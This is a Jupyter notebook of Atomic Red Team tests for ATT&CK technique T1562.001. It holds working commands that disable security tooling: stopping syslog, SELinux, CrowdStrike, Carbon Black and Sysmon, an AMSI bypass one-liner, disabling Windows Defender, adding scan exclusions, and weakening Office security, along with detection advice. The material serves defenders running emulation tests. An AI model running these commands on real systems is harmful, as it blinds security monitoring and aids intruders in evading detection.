{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1562.001 - Impair Defenses: Disable or Modify Tools",
    "\n",
    "Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - Disable syslog\nDisables syslog collection\n\n**Supported Platforms:** linux\n#### Attack Commands: Run with `sh`\n```sh\nif [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n  service rsyslog stop\n  chkconfig off rsyslog\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n  systemctl stop rsyslog\n  systemctl disable rsyslog\nfi\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - Disable Cb Response\nDisable the Cb Response service\n\n**Supported Platforms:** linux\n#### Attack Commands: Run with `sh`\n```sh\nif [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n  service cbdaemon stop\n  chkconfig off cbdaemon\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n  systemctl stop cbdaemon\n  systemctl disable cbdaemon\nfi\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - Disable SELinux\nDisables SELinux enforcement\n\n**Supported Platforms:** linux\n#### Attack Commands: Run with `sh`\n```sh\nsetenforce 0\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 3"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #4 - Stop Crowdstrike Falcon on Linux\nStop and disable Crowdstrike Falcon on Linux\n\n**Supported Platforms:** linux\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `sh`\n```sh\nsudo systemctl stop falcon-sensor.service\nsudo systemctl disable falcon-sensor.service\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 4"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #5 - Disable Carbon Black Response\nDisables Carbon Black Response\n\n**Supported Platforms:** macos\n#### Attack Commands: Run with `sh`\n```sh\nsudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 5"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #6 - Disable LittleSnitch\nDisables LittleSnitch\n\n**Supported Platforms:** macos\n#### Attack Commands: Run with `sh`\n```sh\nsudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 6"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #7 - Disable OpenDNS Umbrella\nDisables OpenDNS Umbrella\n\n**Supported Platforms:** macos\n#### Attack Commands: Run with `sh`\n```sh\nsudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 7"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #8 - Stop and unload Crowdstrike Falcon on macOS\nStop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS\n\n**Supported Platforms:** macos\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `sh`\n```sh\nsudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.falcond.plist\nsudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 8"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #9 - Unload Sysmon Filter Driver\nUnloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,\nrun the prereq_command's and it should fail with an error of \"sysmon filter must be loaded\".\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Dependencies:  Run with `powershell`!\n##### Description: Sysmon must be downloaded\n\n##### Check Prereq Commands:\n```powershell\nif ((cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") -or (Test-Path $env:Temp\\Sysmon\\Sysmon.exe)) { exit 0 } else { exit 1 }\n\n```\n##### Get Prereq Commands:\n```powershell\nInvoke-WebRequest \"https://download.sysinternals.com/files/Sysmon.zip\" -OutFile \"$env:TEMP\\Sysmon.zip\"\nExpand-Archive $env:TEMP\\Sysmon.zip $env:TEMP\\Sysmon -Force\nRemove-Item $env:TEMP\\Sysmon.zip -Force\n\n```\n##### Description: sysmon must be Installed\n\n##### Check Prereq Commands:\n```powershell\nif(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }\n\n```\n##### Get Prereq Commands:\n```powershell\nif(cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") { C:\\Windows\\Sysmon.exe -accepteula -i } else\n{ Set-Location $env:TEMP\\Sysmon\\; .\\Sysmon.exe -accepteula -i}\n\n```\n##### Description: sysmon filter must be loaded\n\n##### Check Prereq Commands:\n```powershell\nif(fltmc.exe filters | findstr SysmonDrv) { exit 0 } else { exit 1 }\n\n```\n##### Get Prereq Commands:\n```powershell\nsysmon -u\nsysmon -accepteula -i\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 9 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nfltmc.exe unload SysmonDrv\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 9"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #10 - Uninstall Sysmon\nUninstall Sysinternals Sysmon for Defense Evasion\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Dependencies:  Run with `powershell`!\n##### Description: Sysmon executable must be available\n\n##### Check Prereq Commands:\n```powershell\nif(cmd /c where sysmon) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\n$parentpath = Split-Path \"PathToAtomicsFolder\\T1562.001\\bin\\sysmon.exe\"; $zippath = \"$parentpath\\Sysmon.zip\"\nNew-Item -ItemType Directory $parentpath -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/Sysmon.zip\" -OutFile \"$zippath\"\nExpand-Archive $zippath $parentpath -Force; Remove-Item $zippath\nif(-not ($Env:Path).contains($parentpath)){$Env:Path += \";$parentpath\"}\n\n```\n##### Description: Sysmon must be installed\n\n##### Check Prereq Commands:\n```powershell\nif(cmd /c sc query sysmon) { exit 0} else { exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\ncmd /c sysmon -i -accepteula\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 10 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nsysmon -u\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 10"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #11 - AMSI Bypass - AMSI InitFailed\nAny easy way to bypass AMSI inspection is it patch the dll in memory setting the \"amsiInitFailed\" function to true.\nUpon execution, no output is displayed.\n\nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 11"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key\nWith administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis test removes the Windows Defender provider registry key. Upon execution, no output is displayed.\nOpen Registry Editor and navigate to \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\\" to verify that it is gone.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\nRemove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 12"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #13 - Disable Arbitrary Security Windows Service\nWith administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.\nChange the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.\nTo verify that the service has stopped, run \"sc query McAfeeDLPAgentService\"\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nnet.exe stop McAfeeDLPAgentService\nsc.exe config McAfeeDLPAgentService start= disabled\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 13"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #14 - Tamper with Windows Defender ATP PowerShell\nAttempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled\nin Windows settings.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\nSet-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 14"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #15 - Tamper with Windows Defender Command Prompt\nAttempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.\nHowever, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, \"Access Denied\"\nwill be displayed twice and the WinDefend service status will be displayed.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nsc stop WinDefend\nsc config WinDefend start=disabled\nsc query WinDefend\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 15"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #16 - Tamper with Windows Defender Registry\nDisable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be\ngrayed out and have no info.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\nSet-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 16"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #17 - Disable Microsoft Office Security Features\nGorgon group may disable Office security features so that their code can run. Upon execution, an external document will not\nshow any warning before editing the document.\n\n\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\" -Name \"VBAWarnings\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableInternetFilesInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableUnsafeLocationsInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableAttachementsInPV\" -Value \"1\" -PropertyType \"Dword\"\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 17"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #18 - Remove Windows Defender Definition Files\nRemoving definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.\nOn later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the\ncommand will say completed.\n\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\n\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 18"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service\nBeginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\nStop-Service -Name McAfeeDLPAgentService\nRemove-Service -Name McAfeeDLPAgentService\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 19"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #20 - Uninstall Crowdstrike Falcon on Windows\nUninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\nif (Test-Path \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\") {. \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\" /repair /uninstall /quiet } else { Get-ChildItem -Path \"C:\\ProgramData\\Package Cache\" -Include \"WindowsSensor.exe\" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq \"Valid\" -and $sig.SignerCertificate.DnsNameList -eq \"CrowdStrike, Inc.\") { . \"$_\" /repair /uninstall /quiet; break;}}}```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 20"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #21 - Tamper with Windows Defender Evade Scanning -Folder\nMalware can exclude a specific path from being scanned and evading detection. \nUpon successul execution, the file provided should be on the list of excluded path. \nTo check the exclusion list using poweshell (Get-MpPreference).ExclusionPath \n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\n$excludedpath= \"C:\\Temp\"\nAdd-MpPreference -ExclusionPath $excludedpath```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 21"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Extension\nMalware can exclude specific extensions from being scanned and evading detection. \nUpon successful execution, the extension(s) should be on the list of excluded extensions.\nTo check the exclusion list using poweshell  (Get-MpPreference).ExclusionExtension.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\n$excludedExts= \".exe\"\nAdd-MpPreference -ExclusionExtension  $excludedExts```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 22"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Process\nMalware can exclude specific processes from being scanned and evading detection.\nUpon successful execution, the process(es) should be on the list of excluded processes. \nTo check the exclusion list using poweshell  (Get-MpPreference).ExclusionProcess.\"\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\n$excludedProcess = \"outlook.exe\"\nAdd-MpPreference -ExclusionProcess $excludedProcess```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1562.001 -TestNumbers 23"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious."
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}